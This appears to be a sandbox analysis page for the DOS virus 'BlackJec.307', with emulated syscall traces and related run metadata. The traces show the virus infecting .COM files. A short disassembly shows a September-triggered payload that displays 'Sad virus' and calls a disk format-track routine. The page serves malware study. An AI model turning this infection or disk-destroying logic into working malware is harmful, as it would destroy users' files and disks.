Sample viewer

vx.netlux.org/Virus.DOS.BlackJec.307

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:15:31.417618927Z 42 PC: 12a46 | Get date 0x12a46: cmp dh, 9
0x12a49: jne 0x12a65
0x12a4b: lea dx, word ptr [0x214]
0x12a4f: mov ah, 9
0x12a51: int 0x21
0x12a53: mov ah, 0x19
0x12a55: int 0x21
0x12a57: mov dl, al
0x12a59: mov ah, 5
0x12a5b: mov cl, 1
0x12a5d: mov ch, 0
0x12a5f: mov dh, 0
0x12a61: mov al, 0x10
0x12a63: int 0x13
0x12a65: mov cx, 0x80
0x12a68: mov si, 0x80
0x12a6b: mov di, 0xff7f
0x12a6e: rep movsb byte ptr es:[di], byte ptr [si]
0x12a70: lea ax, word ptr [0x233]
0x12a74: mov cx, ax
2018-12-17T23:15:31.420693686Z 78 PC: 12aa2 | Find first file
2018-12-17T23:15:31.428144081Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:31.429662275Z 61 PC: 12ac3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:15:31.436660358Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:31.444709798Z 63 PC: 12ad8 | Read file or device (Read 407 bytes on handle 5)
2018-12-17T23:15:31.469643535Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.487950645Z 64 PC: 12b09 | Write file or device (Write 714 bytes on handle 6)
2018-12-17T23:15:33.519616896Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.521677569Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.571248094Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.57612437Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.578439101Z 61 PC: 12ac3 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:15:33.586298944Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.588439277Z 63 PC: 12ad8 | Read file or device (Read 27 bytes on handle 6)
2018-12-17T23:15:33.596266179Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.622106981Z 64 PC: 12b09 | Write file or device (Write 334 bytes on handle 7)
2018-12-17T23:15:33.626481893Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.632537697Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.652603433Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.655684244Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.658160808Z 61 PC: 12ac3 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:15:33.665001727Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.666886139Z 63 PC: 12ad8 | Read file or device (Read 92 bytes on handle 7)
2018-12-17T23:15:33.674431061Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.70964444Z 64 PC: 12b09 | Write file or device (Write 399 bytes on handle 8)
2018-12-17T23:15:33.718354842Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.72137541Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.755331936Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.758498959Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.760100058Z 61 PC: 12ac3 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:15:33.774487602Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.776380139Z 63 PC: 12ad8 | Read file or device (Read 29 bytes on handle 8)
2018-12-17T23:15:33.783474203Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.818024646Z 64 PC: 12b09 | Write file or device (Write 336 bytes on handle 9)
2018-12-17T23:15:33.822491161Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.824133248Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.848733217Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.851976132Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.853728576Z 61 PC: 12ac3 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:15:33.862144195Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.86423267Z 63 PC: 12ad8 | Read file or device (Read 29 bytes on handle 9)
2018-12-17T23:15:33.871660061Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.921399273Z 64 PC: 12b09 | Write file or device (Write 336 bytes on handle 10)
2018-12-17T23:15:33.926339439Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.928543351Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.972882593Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.977574182Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.979741345Z 61 PC: 12ac3 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:15:33.987678765Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.990491893Z 63 PC: 12ad8 | Read file or device (Read 501 bytes on handle 10)
2018-12-17T23:15:33.997801853Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:34.043796036Z 64 PC: 12b09 | Write file or device (Write 808 bytes on handle 11)
2018-12-17T23:15:34.076089155Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:34.078483706Z 62 PC: 12b14 | Close file
2018-12-17T23:15:34.116314834Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:34.121262174Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:34.122796057Z 61 PC: 12ac3 | Open file (Filename = 'PAH.COM')
2018-12-17T23:15:34.130592622Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:34.133103361Z 63 PC: 12ad8 | Read file or device (Read 29 bytes on handle 11)
2018-12-17T23:15:34.140427899Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:34.214497593Z 64 PC: 12b09 | Write file or device (Write 336 bytes on handle 12)
2018-12-17T23:15:34.218710662Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:34.221783288Z 62 PC: 12b14 | Close file
2018-12-17T23:15:34.249201594Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:34.252258651Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:34.254845062Z 61 PC: 12ac3 | Open file (Filename = 'TEST.COM')
2018-12-17T23:15:34.261993068Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:34.263845991Z 63 PC: 12ad8 | Read file or device (Read 312 bytes on handle 12)
2018-12-17T23:15:34.268204182Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:34.271619051Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:46.283110233Z 42 PC: 12a46 | Get date 0x12a46: cmp dh, 9
0x12a49: jne 0x12a65
0x12a4b: lea dx, word ptr [0x214]
0x12a4f: mov ah, 9
0x12a51: int 0x21
0x12a53: mov ah, 0x19
0x12a55: int 0x21
0x12a57: mov dl, al
0x12a59: mov ah, 5
0x12a5b: mov cl, 1
0x12a5d: mov ch, 0
0x12a5f: mov dh, 0
0x12a61: mov al, 0x10
0x12a63: int 0x13
0x12a65: mov cx, 0x80
0x12a68: mov si, 0x80
0x12a6b: mov di, 0xff7f
0x12a6e: rep movsb byte ptr es:[di], byte ptr [si]
0x12a70: lea ax, word ptr [0x233]
0x12a74: mov cx, ax
2018-12-25T11:59:46.291712752Z 78 PC: 12aa2 | Find first file
2018-12-25T11:59:46.295561149Z 47 PC: 12aad | Get disk transfer address
2018-12-25T11:59:46.296282536Z 61 PC: 12ac3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:46.300554719Z 87 PC: 12aca | Get or set file date and time
2018-12-25T11:59:46.301466456Z 63 PC: 12ad8 | Read file or device (Read 407 bytes on handle 5)
2018-12-25T11:59:46.305259582Z 60 PC: 12af7 | Create or truncate file
2018-12-25T11:59:49.299251153Z 64 PC: 12b09 | Write file or device (Write 714 bytes on handle 6)
2018-12-25T11:59:49.307483406Z 87 PC: 12b10 | Get or set file date and time
2018-12-25T11:59:49.314529184Z 62 PC: 12b14 | Close file
2018-12-25T11:59:49.32287904Z 79 PC: 12b19 | Find next file
2018-12-25T11:59:49.327143024Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.328436005Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.335776079Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.338722652Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.346883218Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.359999286Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.364407101Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.365909353Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.374043961Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.37719946Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.378914164Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.385648758Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.388221061Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.394874856Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.41140841Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.425548935Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.427511502Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.436162869Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.439404548Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.440706491Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.447324756Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.449610401Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.456254574Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.468740843Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.472811501Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.47439176Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.482108594Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.484953778Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.486218822Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.492433316Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.494492121Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.511041874Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.54580854Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.549779357Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.551232602Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.591304353Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.596343236Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.599446343Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.605847824Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.608447401Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.615167479Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.627479085Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.635840047Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.638989766Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.646934355Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.64976295Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.652313609Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.658975547Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.660636372Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.66830392Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.680331798Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.68416664Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.686784256Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.695372329Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.698486223Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.700896018Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.70738491Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.708802812Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.712051723Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.714634066Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:46.663146799Z 42 PC: 12a46 | Get date 0x12a46: cmp dh, 9
0x12a49: jne 0x12a65
0x12a4b: lea dx, word ptr [0x214]
0x12a4f: mov ah, 9
0x12a51: int 0x21
0x12a53: mov ah, 0x19
0x12a55: int 0x21
0x12a57: mov dl, al
0x12a59: mov ah, 5
0x12a5b: mov cl, 1
0x12a5d: mov ch, 0
0x12a5f: mov dh, 0
0x12a61: mov al, 0x10
0x12a63: int 0x13
0x12a65: mov cx, 0x80
0x12a68: mov si, 0x80
0x12a6b: mov di, 0xff7f
0x12a6e: rep movsb byte ptr es:[di], byte ptr [si]
0x12a70: lea ax, word ptr [0x233]
0x12a74: mov cx, ax
2018-12-25T11:59:46.665813726Z 9 PC: 12a53 | Display string (String= 'Sad virus - 24/8/91 ')
2018-12-25T11:59:46.668530303Z 25 PC: 12a57 | Get default drive
2018-12-25T11:59:46.6713704Z 78 PC: 12aa2 | Find first file
2018-12-25T11:59:46.675590696Z 47 PC: 12aad | Get disk transfer address
2018-12-25T11:59:46.676406999Z 61 PC: 12ac3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:46.680295571Z 87 PC: 12aca | Get or set file date and time
2018-12-25T11:59:46.681798228Z 63 PC: 12ad8 | Read file or device (Read 407 bytes on handle 5)
2018-12-25T11:59:46.685801646Z 60 PC: 12af7 | Create or truncate file
2018-12-25T11:59:49.292733547Z 64 PC: 12b09 | Write file or device (Write 714 bytes on handle 6)
2018-12-25T11:59:49.30323649Z 87 PC: 12b10 | Get or set file date and time
2018-12-25T11:59:49.305401202Z 62 PC: 12b14 | Close file
2018-12-25T11:59:49.323659285Z 79 PC: 12b19 | Find next file
2018-12-25T11:59:49.327517292Z 76 PC: 12a45 | Terminate with return code (Return code = '0')